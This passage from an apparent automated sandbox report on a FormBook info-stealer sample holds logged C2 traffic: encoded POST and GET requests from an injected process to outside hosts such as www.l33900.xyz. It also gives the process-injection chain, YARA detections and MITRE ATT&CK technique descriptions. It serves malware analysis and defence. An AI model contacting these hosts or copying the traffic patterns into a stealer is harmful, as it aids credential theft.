78 78 73 43 37 4c 42 56 51 4c 77 63 43 59 6f 52 52 68 69 66 58 78 7a 37 49 50 6a 50 7a 34 37 47 6a 72 68 75 33 69 65 4c 54 71 45 62 52 52 51 4a 65 75 68 7a 62 62 31 59 77 68 46 2b 34 58 44 36 57 30 47 49 62 64 48 6e 44 76 55 46 76 6c 77 50 44 4a 64 36 49 58 4b 53 45 78 4e 7a 66 4b 53 44 69 5a 4a 45 39 44 54 50 4e 54 72 31 56 2f 46 2b 38 43 73 42 55 41 72 41 75 43 44 2b 43 2f 58 69 54 63 49 35 42 34 65 75 6d 62 50 6c 33 53 45 78 2f 4c [TRUNCATED] Data Ascii: u8S0Yd=nyDFaAJlnv/58n5svrx6ZQ8HDuSSPT3owjj3xJx9C/VJg0GkFKqdT3vVZYV0SPvJmEZmIdAAMPg51ctKZQAr03eJSVB9eiHA7y/9b9M1Zk1ikmyH4+2Fc5fW1M+DktLxhOcVXItJ1VbZ6VY3i4y4u8pNoGVdDYBKkoXF26+gIbhjmMtb6ScANkkcsxxsC7LBVQLwcCYoRRhifXxz7IPjPz47Gjrhu3ieLTqEbRRQJeuhzbb1YwhF+4XD6W0GIbdHnDvUFvlwPDJd6IXKSExNzfKSDiZJE9DTPNTr1V/F+8CsBUArAuCD+C/XiTcI5B4eumbPl3SEx/LnIvqrSLTS3LK4/+lvrMyORva3QqYlBCs6IxnCIALKyvg5DeL1LLNHamU2qMiw+s15O0+eO2XTmiAjL0FOax9TlJCyXzNjsJwfUzYsgZxIMFaH2XEfzcF7fTJfaqYE/xfJoEMLOGacpBHxQMqYrALZiEc2vsYbvWA38jNp3Wd1jG88OLXW5PHuyjugoN4NGE6TWfDH5xRFGLeffMIeo9CmBeswfOE3MuZYsG5u4o7kF3Kp3EL3rg3je5a5mDnmWTMBw2NDKfe+Lz7F2U3Kh5Fm6RbK0t7f98Eijqh4glprQdPwQ96I6otY/+bula5wE6vyWDtk60fPj1XVXCKVDOFu5Qv2V0Vm0RwjR57bTqQaKl2pot0wAlWv+b3KkVUaCsgRdHNJwAd0LsWxfVzpNvJZO9TvuJ58HQyAONrQAXAhjgpbKAs2TaciOvZAela62eboNJDKWfoOcTGU/VUF12YGVA4Cgbm7+1q0grPbX1Ak9+sYKGt+O3NoVnuPtYygvgHIK1NmT36T4zhliWZYSkg/MJ3vHUmULJkRxO0Hqmt4IsLjWInQHEroQY4lOwqZrgn6q6tkr4XG9ZZ+qOWhUTWG+RL45BtMIGg3+7AQthPiJcusB7ga+GN79aq0K/sg+wQdI0+647W7j+Bycf5/o2NXcXdSL0LZVT8GT [TRUNCATED]
Apr 1, 2025 09:05:23.797908068 CEST	114	IN	HTTP/1.1 404 Server: nginx/1.18.0 Date: Tue, 01 Apr 2025 07:05:23 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49739	47.83.1.90	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:05:25.659905910 CEST	458	OUT	GET /iwsk/?u8S0Yd=qwrlZwFE4brJ+UsahaR/fyoAcueLAHC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZ5HvPPEpkNgGf01LcGvMYf08xqXnjg67beq0=&rvNTa=V4hx68Jpk HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Connection: close Host: www.qzsazi.info User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Apr 1, 2025 09:05:26.658189058 CEST	114	IN	HTTP/1.1 404 Server: nginx/1.18.0 Date: Tue, 01 Apr 2025 07:05:26 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49740	162.218.30.235	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:05:32.116102934 CEST	718	OUT	POST /gwiz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 203 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.l33900.xyz Origin: http://www.l33900.xyz Referer: http://www.l33900.xyz/gwiz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 75 38 53 30 59 64 3d 7a 50 69 45 66 31 74 56 79 34 48 63 73 33 50 57 34 63 4e 2f 58 58 50 34 57 75 70 38 4a 51 77 6a 2f 4a 6c 77 69 49 53 4d 62 4d 46 6b 71 37 74 6b 47 69 57 4a 59 61 74 44 4f 77 5a 73 37 6c 4e 79 34 64 35 37 6f 74 49 52 6e 6a 36 78 42 78 69 31 6e 53 53 6c 4b 67 59 4f 5a 33 59 65 46 55 32 2b 49 64 75 63 4e 39 6a 6b 4e 4b 63 44 64 34 52 30 65 4a 33 48 42 57 52 2f 2f 58 31 79 69 2b 4b 57 78 4a 34 55 65 64 46 4f 6b 6f 65 6b 4a 4d 4f 38 6d 4c 38 5a 54 2b 64 5a 48 4f 67 72 45 2f 42 45 56 4d 69 71 65 69 49 75 67 35 53 4f 44 6c 63 70 2b 55 42 77 54 49 6d 39 6b 41 4f 74 38 33 34 66 2f 51 3d 3d Data Ascii: u8S0Yd=zPiEf1tVy4Hcs3PW4cN/XXP4Wup8JQwj/JlwiISMbMFkq7tkGiWJYatDOwZs7lNy4d57otIRnj6xBxi1nSSlKgYOZ3YeFU2+IducN9jkNKcDd4R0eJ3HBWR//X1yi+KWxJ4UedFOkoekJMO8mL8ZT+dZHOgrE/BEVMiqeiIug5SODlcp+UBwTIm9kAOt834f/Q==
Apr 1, 2025 09:05:32.283509970 CEST	455	IN	HTTP/1.1 302 Redirect Content-Type: text/html; charset=UTF-8 Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/ Server: Microsoft-IIS/10.0 Date: Tue, 01 Apr 2025 07:05:32 GMT Connection: close Content-Length: 200 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 39 36 34 34 32 2f 67 77 69 7a 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/"></a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49741	162.218.30.235	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:05:34.821824074 CEST	738	OUT	POST /gwiz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 223 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.l33900.xyz Origin: http://www.l33900.xyz Referer: http://www.l33900.xyz/gwiz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 75 38 53 30 59 64 3d 7a 50 69 45 66 31 74 56 79 34 48 63 75 57 66 57 72 74 4e 2f 62 6e 50 37 54 75 70 38 48 77 78 6b 2f 4a 70 77 69 4a 48 4c 62 65 68 6b 72 65 70 6b 55 52 4f 4a 62 61 74 44 47 51 5a 70 6b 31 4e 50 34 64 30 47 6f 73 30 52 6e 6a 75 78 42 77 53 31 6e 68 71 6b 4c 77 59 4d 55 58 59 63 62 6b 32 2b 49 64 75 63 4e 39 32 50 4e 4b 45 44 63 4c 4a 30 59 73 4c 41 66 6d 52 38 34 58 31 79 6d 2b 4b 4b 78 4a 34 71 65 63 59 5a 6b 75 53 6b 4a 4d 2b 38 6d 5a 59 61 47 75 64 66 44 4f 68 72 45 4e 6f 57 56 2b 58 53 5a 67 45 53 67 35 47 45 43 6a 52 7a 76 6c 67 6e 42 49 43 4f 35 48 48 5a 78 30 46 57 6b 62 55 75 66 33 72 37 59 74 35 43 6e 35 50 76 63 37 37 31 6c 51 59 3d Data Ascii: u8S0Yd=zPiEf1tVy4HcuWfWrtN/bnP7Tup8Hwxk/JpwiJHLbehkrepkUROJbatDGQZpk1NP4d0Gos0RnjuxBwS1nhqkLwYMUXYcbk2+IducN92PNKEDcLJ0YsLAfmR84X1ym+KKxJ4qecYZkuSkJM+8mZYaGudfDOhrENoWV+XSZgESg5GECjRzvlgnBICO5HHZx0FWkbUuf3r7Yt5Cn5Pvc771lQY=
Apr 1, 2025 09:05:34.999754906 CEST	455	IN	HTTP/1.1 302 Redirect Content-Type: text/html; charset=UTF-8 Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/ Server: Microsoft-IIS/10.0 Date: Tue, 01 Apr 2025 07:05:34 GMT Connection: close Content-Length: 200 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 39 36 34 34 32 2f 67 77 69 7a 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/"></a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49742	162.218.30.235	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:05:37.527936935 CEST	6995	OUT	POST /gwiz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 6479 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.l33900.xyz Origin: http://www.l33900.xyz Referer: http://www.l33900.xyz/gwiz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 75 38 53 30 59 64 3d 7a 50 69 45 66 31 74 56 79 34 48 63 75 57 66 57 72 74 4e 2f 62 6e 50 37 54 75 70 38 48 77 78 6b 2f 4a 70 77 69 4a 48 4c 62 65 70 6b 71 6f 56 6b 47 41 4f 4a 61 61 74 44 4d 77 5a 6f 6b 31 4e 6f 34 64 73 4b 6f 73 34 6e 6b 55 57 78 41 6d 4f 31 67 44 53 6b 42 67 59 4d 45 6e 59 59 51 45 32 34 49 64 2b 59 4e 39 69 50 4e 4a 41 44 63 4c 4a 30 5a 35 33 41 45 57 52 2b 34 58 31 6b 76 65 4b 57 78 4a 34 55 65 65 31 65 6b 2b 79 6b 4a 6f 61 38 6b 71 38 61 62 65 64 64 50 75 68 46 45 4e 30 4c 56 2b 66 47 5a 6b 67 43 67 4a 6d 45 42 55 34 38 34 58 30 54 53 35 4c 53 73 6b 6a 6e 71 46 52 61 6c 62 6b 76 59 43 7a 31 4e 34 5a 55 74 2b 36 46 41 36 7a 43 39 32 58 66 6a 44 68 77 55 6e 6a 46 37 75 33 55 54 61 5a 59 63 72 6a 6f 43 34 33 56 71 55 67 39 2b 36 79 54 46 35 66 53 4c 64 35 74 50 50 47 51 58 64 48 4f 36 2f 61 69 53 4c 35 41 73 2f 69 67 6f 33 39 38 32 45 41 67 38 43 68 56 79 33 53 51 7a 6b 6d 44 73 77 73 65 77 42 63 78 54 42 6e 5a 52 47 6a 48 49 64 45 4e 2b 30 63 53 54 4e 46 6e 2b 72 38 71 36 46 43 [TRUNCATED] Data Ascii: u8S0Yd=zPiEf1tVy4HcuWfWrtN/bnP7Tup8Hwxk/JpwiJHLbepkqoVkGAOJaatDMwZok1No4dsKos4nkUWxAmO1gDSkBgYMEnYYQE24Id+YN9iPNJADcLJ0Z53AEWR+4X1kveKWxJ4Uee1ek+ykJoa8kq8abeddPuhFEN0LV+fGZkgCgJmEBU484X0TS5LSskjnqFRalbkvYCz1N4ZUt+6FA6zC92XfjDhwUnjF7u3UTaZYcrjoC43VqUg9+6yTF5fSLd5tPPGQXdHO6/aiSL5As/igo3982EAg8ChVy3SQzkmDswsewBcxTBnZRGjHIdEN+0cSTNFn+r8q6FCdREs06MhYEjmBToUpkeh3UMqtNWs1xGN6eGbIqjRbA5chtwsSKD3sqHciHpmC0gbv+UDNx1QYd+82Nsfn6yvoVAD35o27dWJzU9Oe0Gd+kFYWyvr+9BalDVXboyXGpPIS0zk7BW4skY8hbHg046uy7ZZLcsERhV/klEqM/GBmeQKlEN8AGaen8TSHSNIpVDxyDHuvdNDifFb7YJNOiiirOR/mRzpHvlr52Zf4tv0pQqqZ/8fTge7oPTDNn6d1+dMMbwO2dVo5HcXNza+AemOE4dgMfgyqOJQ7SdBVhFkARSqgqBg5dsl80w5+bk8mfMU2rorjzBxqQoAiofFN82XoTK2ANM91wvFsX5esSng9ecnzK/ML7lDTRNxhL0VXcYEFNcJvPJiJ8deXNMTMfgKNH0RYCZ9MksWEF2qWdQuZV88K8YJ2Kq/s1tFSH29/LNW+dev0U6BJ8TlY3QB7Q+Gsl7T9aeoWP3a+tlqp3l1VPe+ek68tlLfxAWgyJJgxCf4nX+Xqw6q06FXsCEuYi98w3FJuLYSwoLnVcSAfaHXwDnEW8egZ/R+BoZ04VXvkeqnhONOzgZRZCnahfuPQJbFmHTiUUeWfhW5H5/M+ZN9V74TdZUIbLYydODWqVUHa54SWuHT2dEmnT21UU0EqaNAayNY0I0zS051vR [TRUNCATED]
Apr 1, 2025 09:05:37.692320108 CEST	455	IN	HTTP/1.1 302 Redirect Content-Type: text/html; charset=UTF-8 Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/ Server: Microsoft-IIS/10.0 Date: Tue, 01 Apr 2025 07:05:36 GMT Connection: close Content-Length: 200 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 39 36 34 34 32 2f 67 77 69 7a 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/"></a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49743	162.218.30.235	80	6292	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe

Timestamp	Bytes transferred	Direction	Data
Apr 1, 2025 09:05:40.252130985 CEST	457	OUT	GET /gwiz/?u8S0Yd=+NKkcBFFncXrh1K/zcp2UArZa8QqJD46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1PXl+FEkaCR7LauSDOuuYEZJvaq0HIIPuZm4=&rvNTa=V4hx68Jpk HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Connection: close Host: www.l33900.xyz User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Apr 1, 2025 09:05:40.421483994 CEST	455	IN	HTTP/1.1 302 Redirect Content-Type: text/html; charset=UTF-8 Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/ Server: Microsoft-IIS/10.0 Date: Tue, 01 Apr 2025 07:05:40 GMT Connection: close Content-Length: 200 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 39 36 34 34 32 2f 67 77 69 7a 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/"></a></body>

Statistics

Click to jump to process

Memory Usage

• eoIIBcxUj3.exe
• svchost.exe
• UJarIfYl5U.exe
• sfc.exe
• UJarIfYl5U.exe
• firefox.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Behavior

• eoIIBcxUj3.exe
• svchost.exe
• UJarIfYl5U.exe
• sfc.exe
• UJarIfYl5U.exe
• firefox.exe

Click to jump to process

Target ID:	1
Start time:	03:02:29
Start date:	01/04/2025
Path:	C:\Users\user\Desktop\eoIIBcxUj3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\eoIIBcxUj3.exe"
Imagebase:	0x500000
File size:	1'182'208 bytes
MD5 hash:	C2C8B9851E807452F57CD7A1FABEC3BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:02:31
Start date:	01/04/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\eoIIBcxUj3.exe"
Imagebase:	0xcf0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1552599848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1554111237.0000000005940000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1553603148.0000000003AE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:02:56
Start date:	01/04/2025
Path:	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\Que6zKtSrCf5.exe"
Imagebase:	0xc00000
File size:	143'872 bytes
MD5 hash:	9C98D1A23EFAF1B156A130CEA7D2EE3A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3669745224.00000000029C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	03:02:58
Start date:	01/04/2025
Path:	C:\Windows\SysWOW64\sfc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\sfc.exe"
Imagebase:	0x280000
File size:	40'448 bytes
MD5 hash:	4D2662964EF299131D049EC1278BE08B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3667412952.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3667950546.0000000003360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3669634420.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	03:03:10
Start date:	01/04/2025
Path:	C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UHcFP3RaOlKm.exe"
Imagebase:	0xc00000
File size:	143'872 bytes
MD5 hash:	9C98D1A23EFAF1B156A130CEA7D2EE3A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	03:03:22
Start date:	01/04/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff76aab0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
